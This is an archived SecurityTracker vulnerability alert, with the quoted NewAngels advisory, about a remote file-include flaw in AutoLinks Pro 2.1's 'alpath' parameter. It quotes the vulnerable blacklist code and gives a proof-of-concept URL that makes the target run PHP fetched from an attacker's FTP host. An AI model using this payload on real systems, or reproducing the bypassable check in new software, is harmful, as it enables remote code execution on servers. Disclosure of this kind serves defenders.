SecurityTracker.com Archives - AutoLinks Pro Include File Bug in 'alpath' Lets Remote Users Execute Arbitrary Code

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > AutoLinks

Vendors: ScriptsCenter

AutoLinks Pro Include File Bug in 'alpath' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1014815

SecurityTracker URL: http://securitytracker.com/id?1014815

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Aug 30 2005

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 2.1

Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The flaw resides in 'autolinks/al_initialize.php'.

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system.

NewAngels Team and 4Degrees discovered this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: www.scriptscenter.com/autolinks/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: none@none.com

Message History: None.

Source Message Contents

Date: 28 Aug 2005 18:08:43 -0000
From: none@none.com
Subject: AutoLinks Pro 2.1

 
[NewAngels Advisory #1] AutoLinks Pro 2.1 - Remote File Include Vulnerability
=============================================================================


Software: AutoLinks Pro
Version: 2.1
Type: Remote PHP File Include Vulnerability
Risc: High

Date: 16.08.05
Vendor: ScriptsCenter
Page: http://www.scriptscenter.com/



Credit:
=======
Credit goes to NewAngels Team and especially 4Degrees.



Description:
============
"AutoLinks 2.1 is a full-featured script making life easier for webmasters
relying extensively on link exchanges to bring traffic to their site. Other
webmasters are able to easily exchange links with you, bringing more visitors
to your site and you also have full control on what sites you want to link."
[Quote from http://www.scriptscenter.com/]



PHP Requirements:
=================
register_globals = On



Vulnerability:
=============
Related source from file "autolinks/al_initialize.php":

>// check for hacking attempt
>if(strstr($alpath,"http://") || strstr($alpath,"https://")) exit("Invali
d \$alpath variable");
 
>include($alpath."al_functions.php");

The script does not check wether $alpath contains an absolute URL to a remote
ftp resource.



Exploitation:
=============
/al_initialize.php?alpath=ftp://host.com/

The code in "al_functions.php" will be executed.

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2005, SecurityGlobal.net LLC